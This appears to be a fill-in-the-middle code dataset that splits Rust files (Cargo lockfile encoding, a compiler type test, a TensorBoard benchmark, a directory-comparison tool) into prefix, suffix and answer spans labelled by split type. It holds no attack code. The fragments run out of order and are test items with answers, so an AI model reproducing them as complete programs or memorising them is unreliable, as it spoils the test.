source: Option<SourceId>
}
impl Encodable for EncodablePackageId {
fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> {
let mut out = format!("{} {}", self.name, self.version);
if let Some(ref s) = self.source {
out.push_str(&format!(" ({})", s.to_url()));
}
out.encode(s)
}
}
impl Decodable for EncodablePackageId {
fn decode<D: Decoder>(d: &mut D) -> Result<EncodablePackageId, D::Error> {
let string: String = try!(Decodable::decode(d));
let regex = Regex::new(r"^([^ ]+) ([^ ]+)(?: \(([^\)]+)\))?$").unwrap();
let captures = regex.captures(&string)
.expect("invalid serialized PackageId");
let name = captures.at(1).unwrap();
let version = captures.at(2).unwrap();
let source = captures.at(3);
let source_id = source.map(|s| SourceId::from_url(s));
Ok(EncodablePackageId {
name: name.to_string(),
version: version.to_string(),
source: source_id
})
}
}
impl Encodable for Resolve {
fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> {
let mut ids: Vec<&PackageId> = self.graph.iter().collect();
ids.sort();
let encodable = ids.iter().filter_map(|&id| {
if self.root == *id { return None; }
Some(encodable_resolve_node(id, self))
}).collect::<Vec<EncodableDependency>>();
EncodableResolve {
package: Some(encodable),
root: encodable_resolve_node(&self.root, self),
metadata: self.metadata.clone(),
}.encode(s)
}
}
fn encodable_resolve_node(id: &PackageId, resolve: &Resolve)
-> EncodableDependency
|
EncodableDependency {
name: id.name().to_string(),
version: id.version().to_string(),
source: source,
dependencies: deps,
replace: replace,
}
}
fn encodable_package_id(id: &PackageId) -> EncodablePackageId {
let source = if id.source_id().is_path() {
None
} else {
Some(id.source_id().with_precise(None))
};
EncodablePackageId {
name: id.name().to_string(),
version: id.version().to_string(),
source: source,
}
}
|
{
let (replace, deps) = match resolve.replacement(id) {
Some(id) => {
(Some(encodable_package_id(id)), None)
}
None => {
let mut deps = resolve.graph.edges(id)
.into_iter().flat_map(|a| a)
.map(encodable_package_id)
.collect::<Vec<_>>();
deps.sort();
(None, Some(deps))
}
};
let source = if id.source_id().is_path() {
None
} else {
Some(id.source_id().clone())
};
|
identifier_body
|
encode.rs
|
use std::collections::{HashMap, BTreeMap};
use regex::Regex;
use rustc_serialize::{Encodable, Encoder, Decodable, Decoder};
use core::{Package, PackageId, SourceId, Workspace};
use util::{CargoResult, Graph, Config};
use super::Resolve;
#[derive(RustcEncodable, RustcDecodable, Debug)]
pub struct EncodableResolve {
package: Option<Vec<EncodableDependency>>,
root: EncodableDependency,
metadata: Option<Metadata>,
}
pub type Metadata = BTreeMap<String, String>;
impl EncodableResolve {
pub fn to_resolve(&self, ws: &Workspace) -> CargoResult<Resolve> {
let path_deps = build_path_deps(ws);
let default = try!(ws.current()).package_id().source_id();
let mut g = Graph::new();
let mut tmp = HashMap::new();
let mut replacements = HashMap::new();
let packages = Vec::new();
let packages = self.package.as_ref().unwrap_or(&packages);
let id2pkgid = |id: &EncodablePackageId| {
to_package_id(&id.name, &id.version, id.source.as_ref(),
default, &path_deps)
};
let dep2pkgid = |dep: &EncodableDependency| {
to_package_id(&dep.name, &dep.version, dep.source.as_ref(),
default, &path_deps)
};
let root = try!(dep2pkgid(&self.root));
let ids = try!(packages.iter().map(&dep2pkgid)
.collect::<CargoResult<Vec<_>>>());
{
let mut register_pkg = |pkgid: &PackageId| {
let precise = pkgid.source_id().precise()
.map(|s| s.to_string());
assert!(tmp.insert(pkgid.clone(), precise).is_none(),
"a package was referenced twice in the lockfile");
g.add(pkgid.clone(), &[]);
};
register_pkg(&root);
for id in ids.iter() {
register_pkg(id);
}
}
{
let mut add_dependencies = |id: &PackageId, pkg: &EncodableDependency|
-> CargoResult<()> {
if let Some(ref replace) = pkg.replace {
let replace = try!(id2pkgid(replace));
let replace_precise = tmp.get(&replace).map(|p| {
replace.with_precise(p.clone())
}).unwrap_or(replace);
replacements.insert(id.clone(), replace_precise);
assert!(pkg.dependencies.is_none());
return Ok(())
}
let deps = match pkg.dependencies {
Some(ref deps) => deps,
None => return Ok(()),
};
for edge in deps.iter() {
let to_depend_on = try!(id2pkgid(edge));
let precise_pkgid =
tmp.get(&to_depend_on)
.map(|p| to_depend_on.with_precise(p.clone()))
.unwrap_or(to_depend_on.clone());
g.link(id.clone(), precise_pkgid);
}
Ok(())
};
try!(add_dependencies(&root, &self.root));
for (id, pkg) in ids.iter().zip(packages) {
try!(add_dependencies(id, pkg));
}
}
Ok(Resolve {
graph: g,
root: root,
features: HashMap::new(),
metadata: self.metadata.clone(),
replacements: replacements,
})
}
}
fn build_path_deps(ws: &Workspace) -> HashMap<String, SourceId> {
// If a crate is *not* a path source, then we're probably in a situation
// such as `cargo install` with a lock file from a remote dependency. In
// that case we don't need to fixup any path dependencies (as they're not
// actually path dependencies any more), so we ignore them.
let members = ws.members().filter(|p| {
p.package_id().source_id().is_path()
}).collect::<Vec<_>>();
let mut ret = HashMap::new();
for member in members.iter() {
ret.insert(member.package_id().name().to_string(),
member.package_id().source_id().clone());
}
for member in members.iter() {
build(member, ws.config(), &mut ret);
}
return ret;
fn build(pkg: &Package,
config: &Config,
ret: &mut HashMap<String, SourceId>) {
let deps = pkg.dependencies()
.iter()
.filter(|d|!ret.contains_key(d.name()))
.map(|d| d.source_id())
.filter(|id| id.is_path())
.filter_map(|id| id.url().to_file_path().ok())
.map(|path| path.join("Cargo.toml"))
.filter_map(|path| Package::for_path(&path, config).ok())
.collect::<Vec<_>>();
for pkg in deps {
ret.insert(pkg.name().to_string(),
pkg.package_id().source_id().clone());
build(&pkg, config, ret);
}
}
}
fn to_package_id(name: &str,
version: &str,
source: Option<&SourceId>,
default_source: &SourceId,
path_sources: &HashMap<String, SourceId>)
-> CargoResult<PackageId> {
let source = source.or(path_sources.get(name)).unwrap_or(default_source);
PackageId::new(name, version, source)
}
#[derive(RustcEncodable, RustcDecodable, Debug, PartialOrd, Ord, PartialEq, Eq)]
pub struct EncodableDependency {
name: String,
version: String,
source: Option<SourceId>,
dependencies: Option<Vec<EncodablePackageId>>,
replace: Option<EncodablePackageId>,
}
#[derive(Debug, PartialOrd, Ord, PartialEq, Eq)]
pub struct EncodablePackageId {
name: String,
version: String,
source: Option<SourceId>
}
impl Encodable for EncodablePackageId {
fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> {
let mut out = format!("{} {}", self.name, self.version);
if let Some(ref s) = self.source {
out.push_str(&format!(" ({})", s.to_url()));
}
out.encode(s)
}
}
impl Decodable for EncodablePackageId {
fn decode<D: Decoder>(d: &mut D) -> Result<EncodablePackageId, D::Error> {
let string: String = try!(Decodable::decode(d));
let regex = Regex::new(r"^([^ ]+) ([^ ]+)(?: \(([^\)]+)\))?$").unwrap();
let captures = regex.captures(&string)
.expect("invalid serialized PackageId");
let name = captures.at(1).unwrap();
let version = captures.at(2).unwrap();
let source = captures.at(3);
let source_id = source.map(|s| SourceId::from_url(s));
Ok(EncodablePackageId {
name: name.to_string(),
version: version.to_string(),
source: source_id
})
}
}
impl Encodable for Resolve {
fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> {
let mut ids: Vec<&PackageId> = self.graph.iter().collect();
ids.sort();
let encodable = ids.iter().filter_map(|&id| {
if self.root == *id { return None; }
Some(encodable_resolve_node(id, self))
}).collect::<Vec<EncodableDependency>>();
EncodableResolve {
package: Some(encodable),
root: encodable_resolve_node(&self.root, self),
metadata: self.metadata.clone(),
}.encode(s)
}
}
fn encodable_resolve_node(id: &PackageId, resolve: &Resolve)
-> EncodableDependency {
let (replace, deps) = match resolve.replacement(id) {
Some(id) => {
(Some(encodable_package_id(id)), None)
}
None => {
let mut deps = resolve.graph.edges(id)
.into_iter().flat_map(|a| a)
.map(encodable_package_id)
.collect::<Vec<_>>();
deps.sort();
(None, Some(deps))
}
};
let source = if id.source_id().is_path()
|
else {
Some(id.source_id().clone())
};
EncodableDependency {
name: id.name().to_string(),
version: id.version().to_string(),
source: source,
dependencies: deps,
replace: replace,
}
}
fn encodable_package_id(id: &PackageId) -> EncodablePackageId {
let source = if id.source_id().is_path() {
None
} else {
Some(id.source_id().with_precise(None))
};
EncodablePackageId {
name: id.name().to_string(),
version: id.version().to_string(),
source: source,
}
}
|
{
None
}
|
conditional_block
|
encode.rs
|
use std::collections::{HashMap, BTreeMap};
use regex::Regex;
use rustc_serialize::{Encodable, Encoder, Decodable, Decoder};
use core::{Package, PackageId, SourceId, Workspace};
use util::{CargoResult, Graph, Config};
use super::Resolve;
#[derive(RustcEncodable, RustcDecodable, Debug)]
pub struct EncodableResolve {
package: Option<Vec<EncodableDependency>>,
root: EncodableDependency,
metadata: Option<Metadata>,
}
pub type Metadata = BTreeMap<String, String>;
impl EncodableResolve {
pub fn to_resolve(&self, ws: &Workspace) -> CargoResult<Resolve> {
let path_deps = build_path_deps(ws);
let default = try!(ws.current()).package_id().source_id();
let mut g = Graph::new();
let mut tmp = HashMap::new();
let mut replacements = HashMap::new();
let packages = Vec::new();
let packages = self.package.as_ref().unwrap_or(&packages);
let id2pkgid = |id: &EncodablePackageId| {
to_package_id(&id.name, &id.version, id.source.as_ref(),
default, &path_deps)
};
let dep2pkgid = |dep: &EncodableDependency| {
to_package_id(&dep.name, &dep.version, dep.source.as_ref(),
default, &path_deps)
};
let root = try!(dep2pkgid(&self.root));
let ids = try!(packages.iter().map(&dep2pkgid)
.collect::<CargoResult<Vec<_>>>());
{
let mut register_pkg = |pkgid: &PackageId| {
let precise = pkgid.source_id().precise()
.map(|s| s.to_string());
assert!(tmp.insert(pkgid.clone(), precise).is_none(),
"a package was referenced twice in the lockfile");
g.add(pkgid.clone(), &[]);
};
register_pkg(&root);
for id in ids.iter() {
register_pkg(id);
}
}
{
let mut add_dependencies = |id: &PackageId, pkg: &EncodableDependency|
-> CargoResult<()> {
if let Some(ref replace) = pkg.replace {
let replace = try!(id2pkgid(replace));
let replace_precise = tmp.get(&replace).map(|p| {
replace.with_precise(p.clone())
}).unwrap_or(replace);
replacements.insert(id.clone(), replace_precise);
assert!(pkg.dependencies.is_none());
return Ok(())
}
let deps = match pkg.dependencies {
Some(ref deps) => deps,
None => return Ok(()),
};
for edge in deps.iter() {
let to_depend_on = try!(id2pkgid(edge));
let precise_pkgid =
tmp.get(&to_depend_on)
.map(|p| to_depend_on.with_precise(p.clone()))
.unwrap_or(to_depend_on.clone());
g.link(id.clone(), precise_pkgid);
}
Ok(())
};
try!(add_dependencies(&root, &self.root));
for (id, pkg) in ids.iter().zip(packages) {
try!(add_dependencies(id, pkg));
}
}
Ok(Resolve {
graph: g,
root: root,
features: HashMap::new(),
metadata: self.metadata.clone(),
replacements: replacements,
})
}
}
fn build_path_deps(ws: &Workspace) -> HashMap<String, SourceId> {
// If a crate is *not* a path source, then we're probably in a situation
// such as `cargo install` with a lock file from a remote dependency. In
// that case we don't need to fixup any path dependencies (as they're not
// actually path dependencies any more), so we ignore them.
let members = ws.members().filter(|p| {
p.package_id().source_id().is_path()
}).collect::<Vec<_>>();
let mut ret = HashMap::new();
for member in members.iter() {
ret.insert(member.package_id().name().to_string(),
member.package_id().source_id().clone());
}
for member in members.iter() {
build(member, ws.config(), &mut ret);
}
return ret;
fn build(pkg: &Package,
config: &Config,
ret: &mut HashMap<String, SourceId>) {
let deps = pkg.dependencies()
.iter()
.filter(|d|!ret.contains_key(d.name()))
.map(|d| d.source_id())
.filter(|id| id.is_path())
.filter_map(|id| id.url().to_file_path().ok())
.map(|path| path.join("Cargo.toml"))
.filter_map(|path| Package::for_path(&path, config).ok())
.collect::<Vec<_>>();
for pkg in deps {
ret.insert(pkg.name().to_string(),
pkg.package_id().source_id().clone());
build(&pkg, config, ret);
}
}
}
fn to_package_id(name: &str,
version: &str,
source: Option<&SourceId>,
default_source: &SourceId,
path_sources: &HashMap<String, SourceId>)
-> CargoResult<PackageId> {
let source = source.or(path_sources.get(name)).unwrap_or(default_source);
PackageId::new(name, version, source)
}
#[derive(RustcEncodable, RustcDecodable, Debug, PartialOrd, Ord, PartialEq, Eq)]
pub struct EncodableDependency {
name: String,
version: String,
source: Option<SourceId>,
dependencies: Option<Vec<EncodablePackageId>>,
replace: Option<EncodablePackageId>,
}
#[derive(Debug, PartialOrd, Ord, PartialEq, Eq)]
pub struct EncodablePackageId {
name: String,
version: String,
source: Option<SourceId>
}
impl Encodable for EncodablePackageId {
fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> {
let mut out = format!("{} {}", self.name, self.version);
if let Some(ref s) = self.source {
out.push_str(&format!(" ({})", s.to_url()));
}
out.encode(s)
}
}
impl Decodable for EncodablePackageId {
fn decode<D: Decoder>(d: &mut D) -> Result<EncodablePackageId, D::Error> {
let string: String = try!(Decodable::decode(d));
let regex = Regex::new(r"^([^ ]+) ([^ ]+)(?: \(([^\)]+)\))?$").unwrap();
let captures = regex.captures(&string)
.expect("invalid serialized PackageId");
let name = captures.at(1).unwrap();
let version = captures.at(2).unwrap();
let source = captures.at(3);
let source_id = source.map(|s| SourceId::from_url(s));
Ok(EncodablePackageId {
name: name.to_string(),
version: version.to_string(),
source: source_id
})
}
}
impl Encodable for Resolve {
fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> {
let mut ids: Vec<&PackageId> = self.graph.iter().collect();
ids.sort();
let encodable = ids.iter().filter_map(|&id| {
if self.root == *id { return None; }
Some(encodable_resolve_node(id, self))
}).collect::<Vec<EncodableDependency>>();
EncodableResolve {
package: Some(encodable),
root: encodable_resolve_node(&self.root, self),
metadata: self.metadata.clone(),
}.encode(s)
}
}
fn encodable_resolve_node(id: &PackageId, resolve: &Resolve)
-> EncodableDependency {
let (replace, deps) = match resolve.replacement(id) {
Some(id) => {
(Some(encodable_package_id(id)), None)
}
None => {
let mut deps = resolve.graph.edges(id)
.into_iter().flat_map(|a| a)
.map(encodable_package_id)
.collect::<Vec<_>>();
deps.sort();
(None, Some(deps))
}
};
let source = if id.source_id().is_path() {
None
} else {
Some(id.source_id().clone())
};
EncodableDependency {
name: id.name().to_string(),
version: id.version().to_string(),
source: source,
dependencies: deps,
replace: replace,
}
}
fn
|
(id: &PackageId) -> EncodablePackageId {
let source = if id.source_id().is_path() {
None
} else {
Some(id.source_id().with_precise(None))
};
EncodablePackageId {
name: id.name().to_string(),
version: id.version().to_string(),
source: source,
}
}
|
encodable_package_id
|
identifier_name
|
associated-types-nested-projections.rs
|
// Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Test that we can resolve nested projection types. Issue #20666.
// pretty-expanded FIXME #23616
#![feature(core)]
use std::slice;
trait Bound {}
impl<'a> Bound for &'a i32 {}
trait IntoIterator {
type Iter: Iterator;
fn into_iter(self) -> Self::Iter;
}
|
fn into_iter(self) -> slice::Iter<'a, T> {
self.iter()
}
}
fn foo<X>(x: X) where
X: IntoIterator,
<<X as IntoIterator>::Iter as Iterator>::Item: Bound,
{
}
fn bar<T, I, X>(x: X) where
T: Bound,
I: Iterator<Item=T>,
X: IntoIterator<Iter=I>,
{
}
fn main() {
foo(&[0, 1, 2]);
bar(&[0, 1, 2]);
}
|
impl<'a, T> IntoIterator for &'a [T; 3] {
type Iter = slice::Iter<'a, T>;
|
random_line_split
|
associated-types-nested-projections.rs
|
// Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Test that we can resolve nested projection types. Issue #20666.
// pretty-expanded FIXME #23616
#![feature(core)]
use std::slice;
trait Bound {}
impl<'a> Bound for &'a i32 {}
trait IntoIterator {
type Iter: Iterator;
fn into_iter(self) -> Self::Iter;
}
impl<'a, T> IntoIterator for &'a [T; 3] {
type Iter = slice::Iter<'a, T>;
fn into_iter(self) -> slice::Iter<'a, T> {
self.iter()
}
}
fn foo<X>(x: X) where
X: IntoIterator,
<<X as IntoIterator>::Iter as Iterator>::Item: Bound,
{
}
fn
|
<T, I, X>(x: X) where
T: Bound,
I: Iterator<Item=T>,
X: IntoIterator<Iter=I>,
{
}
fn main() {
foo(&[0, 1, 2]);
bar(&[0, 1, 2]);
}
|
bar
|
identifier_name
|
associated-types-nested-projections.rs
|
// Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Test that we can resolve nested projection types. Issue #20666.
// pretty-expanded FIXME #23616
#![feature(core)]
use std::slice;
trait Bound {}
impl<'a> Bound for &'a i32 {}
trait IntoIterator {
type Iter: Iterator;
fn into_iter(self) -> Self::Iter;
}
impl<'a, T> IntoIterator for &'a [T; 3] {
type Iter = slice::Iter<'a, T>;
fn into_iter(self) -> slice::Iter<'a, T> {
self.iter()
}
}
fn foo<X>(x: X) where
X: IntoIterator,
<<X as IntoIterator>::Iter as Iterator>::Item: Bound,
{
}
fn bar<T, I, X>(x: X) where
T: Bound,
I: Iterator<Item=T>,
X: IntoIterator<Iter=I>,
|
fn main() {
foo(&[0, 1, 2]);
bar(&[0, 1, 2]);
}
|
{
}
|
identifier_body
|
bench.rs
|
/* Copyright 2020 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
//! Simple benchmark to completely load a logdir and then exit.
use clap::Clap;
use log::info;
use std::path::PathBuf;
use std::sync::Arc;
use std::time::Instant;
use rustboard_core::commit::Commit;
use rustboard_core::logdir::LogdirLoader;
use rustboard_core::{cli::dynamic_logdir::DynLogdir, types::PluginSamplingHint};
#[derive(Clap)]
struct Opts {
#[clap(long)]
logdir: PathBuf,
#[clap(long, default_value = "info")]
log_level: String,
#[clap(long)]
reload_threads: Option<usize>,
// Pair of `--no-checksum` and `--checksum` flags, defaulting to "no checksum".
#[clap(long, multiple_occurrences = true, overrides_with = "checksum")]
#[allow(unused)]
no_checksum: bool,
#[clap(long, multiple_occurrences = true, overrides_with = "no_checksum")]
checksum: bool,
}
fn
|
() {
let opts: Opts = Opts::parse();
init_logging(&opts);
let commit = Commit::new();
let logdir = DynLogdir::new(opts.logdir).expect("DynLogdir::new");
let mut loader = LogdirLoader::new(
&commit,
logdir,
opts.reload_threads.unwrap_or(0),
Arc::new(PluginSamplingHint::default()),
);
loader.checksum(opts.checksum); // if neither `--[no-]checksum` given, defaults to false
info!("Starting load cycle");
let start = Instant::now();
loader.reload();
let end = Instant::now();
info!("Finished load cycle ({:?})", end - start);
}
fn init_logging(opts: &Opts) {
use env_logger::{Builder, Env};
Builder::from_env(Env::default().default_filter_or(&opts.log_level))
.format_timestamp_micros()
.init();
}
|
main
|
identifier_name
|
bench.rs
|
/* Copyright 2020 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
//! Simple benchmark to completely load a logdir and then exit.
use clap::Clap;
use log::info;
use std::path::PathBuf;
use std::sync::Arc;
use std::time::Instant;
use rustboard_core::commit::Commit;
use rustboard_core::logdir::LogdirLoader;
use rustboard_core::{cli::dynamic_logdir::DynLogdir, types::PluginSamplingHint};
#[derive(Clap)]
struct Opts {
#[clap(long)]
logdir: PathBuf,
#[clap(long, default_value = "info")]
log_level: String,
#[clap(long)]
reload_threads: Option<usize>,
// Pair of `--no-checksum` and `--checksum` flags, defaulting to "no checksum".
#[clap(long, multiple_occurrences = true, overrides_with = "checksum")]
#[allow(unused)]
no_checksum: bool,
#[clap(long, multiple_occurrences = true, overrides_with = "no_checksum")]
checksum: bool,
}
fn main() {
let opts: Opts = Opts::parse();
init_logging(&opts);
let commit = Commit::new();
let logdir = DynLogdir::new(opts.logdir).expect("DynLogdir::new");
let mut loader = LogdirLoader::new(
&commit,
logdir,
opts.reload_threads.unwrap_or(0),
Arc::new(PluginSamplingHint::default()),
);
loader.checksum(opts.checksum); // if neither `--[no-]checksum` given, defaults to false
info!("Starting load cycle");
let start = Instant::now();
loader.reload();
let end = Instant::now();
info!("Finished load cycle ({:?})", end - start);
}
fn init_logging(opts: &Opts) {
use env_logger::{Builder, Env};
Builder::from_env(Env::default().default_filter_or(&opts.log_level))
.format_timestamp_micros()
|
.init();
}
|
random_line_split
|
|
bench.rs
|
/* Copyright 2020 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
//! Simple benchmark to completely load a logdir and then exit.
use clap::Clap;
use log::info;
use std::path::PathBuf;
use std::sync::Arc;
use std::time::Instant;
use rustboard_core::commit::Commit;
use rustboard_core::logdir::LogdirLoader;
use rustboard_core::{cli::dynamic_logdir::DynLogdir, types::PluginSamplingHint};
#[derive(Clap)]
struct Opts {
#[clap(long)]
logdir: PathBuf,
#[clap(long, default_value = "info")]
log_level: String,
#[clap(long)]
reload_threads: Option<usize>,
// Pair of `--no-checksum` and `--checksum` flags, defaulting to "no checksum".
#[clap(long, multiple_occurrences = true, overrides_with = "checksum")]
#[allow(unused)]
no_checksum: bool,
#[clap(long, multiple_occurrences = true, overrides_with = "no_checksum")]
checksum: bool,
}
fn main() {
let opts: Opts = Opts::parse();
init_logging(&opts);
let commit = Commit::new();
let logdir = DynLogdir::new(opts.logdir).expect("DynLogdir::new");
let mut loader = LogdirLoader::new(
&commit,
logdir,
opts.reload_threads.unwrap_or(0),
Arc::new(PluginSamplingHint::default()),
);
loader.checksum(opts.checksum); // if neither `--[no-]checksum` given, defaults to false
info!("Starting load cycle");
let start = Instant::now();
loader.reload();
let end = Instant::now();
info!("Finished load cycle ({:?})", end - start);
}
fn init_logging(opts: &Opts)
|
{
use env_logger::{Builder, Env};
Builder::from_env(Env::default().default_filter_or(&opts.log_level))
.format_timestamp_micros()
.init();
}
|
identifier_body
|
|
main.rs
|
#[macro_use]
extern crate serde_derive;
extern crate docopt;
use docopt::Docopt;
use std::fs;
use std::path::PathBuf;
mod directory_files;
use directory_files::*;
mod file_comparable;
mod directory_comparable;
use directory_comparable::*;
/// The Docopt usage string
const USAGE: &'static str = "
Usage: subset [-q | -v] [-t | -n] [-b] <dir1> <dir2>
subset --help
subset lets you compare two directory structures.
We are going to check whether the files in dir1 are a subset of the files in dir2, regardless of directory structure.
We are going to check to see that every file under the directory structure in dir1 must be present somewhere in the dir2 directory structure, regardless of where in the directory structure or definitions of equality.
There are multiple definitions of file equality that you can specify using flags, but the default is a MD5 hash of the contents of the file. It is conceivable that you can define a custom equality strategy that relies on other parameters, such as file name, subdirectory location, metadata, EXIF data, etc. The possibilities are endless.
Common options:
-h, --help Show this usage message.
-q, --quiet Do not print all mappings.
-v, --verbose Print all mappings.
-t, --trivial Will swap out the MD5 comparison for a trivial comparison (everything is equal). (This is to test extensibility.)
-n, --name Will swap out the MD5 comparison for a filename comparison.
-b, --bidirectional Also check whether dir2 is also a subset of dir1 (essentially, set equality) and print out missing lists for both directories.
";
// We should think about moving away from DocOpt soon since it uses RustcDecodable,
// which is deprecated in favor of serde?
/// Parsing comand line arguments here
#[derive(Debug, Deserialize)]
struct
|
{
arg_dir1: String,
arg_dir2: String,
flag_quiet: bool,
flag_verbose: bool,
flag_trivial: bool,
flag_name: bool,
flag_bidirectional: bool,
}
/// This should be the UI layer as much as possible-- it parses the command line arguments,
/// hands it off to our business logic, and then collects the answers back and print them.
fn main() {
let args: Args = Docopt::new(USAGE)
.and_then(|d| d.deserialize())
.unwrap_or_else(|e| e.exit());
println!("Comparing {} with {}", args.arg_dir1, args.arg_dir2);
// Make sure both of our inputs are valid directories
fs::read_dir(&args.arg_dir1).expect("Directory cannot be read!");
fs::read_dir(&args.arg_dir2).expect("Directory cannot be read!");
// Main logic: using dynamic dispatch
// (I don't feel too bad about boxing here because this is essentially a singleton.)
let mut program: Box<DirectoryComparable> = if args.flag_trivial {
Box::new(TrivialDirectoryComparable {})
} else if args.flag_name {
let filename_comparator = file_comparable::FileNameComparable::new();
Box::new(DirectoryComparableWithFileComparable::new(
filename_comparator,
))
} else {
let md5_comparator = file_comparable::Md5Comparable::new();
Box::new(DirectoryComparableWithFileComparable::new(md5_comparator))
};
let superset_dirpath = PathBuf::from(&args.arg_dir2);
// eww... why do we have to coerce these Box types again?
// (again, only two of these Box types in existence so not so bad...)
let mut superset_iter: Box<Iterator<Item = PathBuf>> =
Box::new(DirectoryFiles::new(&superset_dirpath));
let subset_dirpath = PathBuf::from(&args.arg_dir1);
let mut subset_iter: Box<Iterator<Item = PathBuf>> =
Box::new(DirectoryFiles::new(&subset_dirpath)); // mut needed for.by_ref
if args.flag_bidirectional {
// Run program
let (subset_missing_result, superset_missing_result) =
program.report_missing_bidirectional(&mut subset_iter, &mut superset_iter);
// View layer (printing)
for missing_file in subset_missing_result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
superset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}\n",
subset_missing_result.len(),
superset_dirpath.display()
);
for missing_file in superset_missing_result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
subset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}",
superset_missing_result.len(),
subset_dirpath.display()
);
} else {
// Run program
let result = program.report_missing(&mut subset_iter, &mut superset_iter);
// View layer (printing)
for missing_file in result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
superset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}",
result.len(),
superset_dirpath.display()
);
}
}
|
Args
|
identifier_name
|
main.rs
|
#[macro_use]
extern crate serde_derive;
extern crate docopt;
use docopt::Docopt;
use std::fs;
use std::path::PathBuf;
mod directory_files;
use directory_files::*;
mod file_comparable;
mod directory_comparable;
use directory_comparable::*;
/// The Docopt usage string
const USAGE: &'static str = "
Usage: subset [-q | -v] [-t | -n] [-b] <dir1> <dir2>
subset --help
subset lets you compare two directory structures.
We are going to check whether the files in dir1 are a subset of the files in dir2, regardless of directory structure.
We are going to check to see that every file under the directory structure in dir1 must be present somewhere in the dir2 directory structure, regardless of where in the directory structure or definitions of equality.
There are multiple definitions of file equality that you can specify using flags, but the default is a MD5 hash of the contents of the file. It is conceivable that you can define a custom equality strategy that relies on other parameters, such as file name, subdirectory location, metadata, EXIF data, etc. The possibilities are endless.
Common options:
-h, --help Show this usage message.
-q, --quiet Do not print all mappings.
-v, --verbose Print all mappings.
-t, --trivial Will swap out the MD5 comparison for a trivial comparison (everything is equal). (This is to test extensibility.)
-n, --name Will swap out the MD5 comparison for a filename comparison.
-b, --bidirectional Also check whether dir2 is also a subset of dir1 (essentially, set equality) and print out missing lists for both directories.
";
// We should think about moving away from DocOpt soon since it uses RustcDecodable,
// which is deprecated in favor of serde?
/// Parsing comand line arguments here
#[derive(Debug, Deserialize)]
struct Args {
arg_dir1: String,
arg_dir2: String,
flag_quiet: bool,
flag_verbose: bool,
flag_trivial: bool,
flag_name: bool,
flag_bidirectional: bool,
}
/// This should be the UI layer as much as possible-- it parses the command line arguments,
/// hands it off to our business logic, and then collects the answers back and print them.
fn main() {
let args: Args = Docopt::new(USAGE)
.and_then(|d| d.deserialize())
.unwrap_or_else(|e| e.exit());
println!("Comparing {} with {}", args.arg_dir1, args.arg_dir2);
// Make sure both of our inputs are valid directories
fs::read_dir(&args.arg_dir1).expect("Directory cannot be read!");
fs::read_dir(&args.arg_dir2).expect("Directory cannot be read!");
// Main logic: using dynamic dispatch
// (I don't feel too bad about boxing here because this is essentially a singleton.)
let mut program: Box<DirectoryComparable> = if args.flag_trivial {
Box::new(TrivialDirectoryComparable {})
} else if args.flag_name
|
else {
let md5_comparator = file_comparable::Md5Comparable::new();
Box::new(DirectoryComparableWithFileComparable::new(md5_comparator))
};
let superset_dirpath = PathBuf::from(&args.arg_dir2);
// eww... why do we have to coerce these Box types again?
// (again, only two of these Box types in existence so not so bad...)
let mut superset_iter: Box<Iterator<Item = PathBuf>> =
Box::new(DirectoryFiles::new(&superset_dirpath));
let subset_dirpath = PathBuf::from(&args.arg_dir1);
let mut subset_iter: Box<Iterator<Item = PathBuf>> =
Box::new(DirectoryFiles::new(&subset_dirpath)); // mut needed for.by_ref
if args.flag_bidirectional {
// Run program
let (subset_missing_result, superset_missing_result) =
program.report_missing_bidirectional(&mut subset_iter, &mut superset_iter);
// View layer (printing)
